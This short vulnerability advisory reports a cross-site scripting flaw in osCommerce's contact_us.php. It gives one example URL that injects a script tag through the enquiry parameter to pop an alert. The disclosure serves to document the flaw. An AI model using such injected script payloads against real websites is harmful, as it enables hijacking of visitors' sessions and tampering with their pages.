OSCommerce Contact_us.PHP Cross-Site Scripting Vulnerability

OSCommerce Contact_us.PHP Cross-Site Scripting Vulnerability

No exploit is required, the following example is available:

http://www.example.com/contact_us.php?&name=1&email=1&enquiry=%3C/textarea%3E%3Cscript%3Ealert('w00t');%3C/script%3E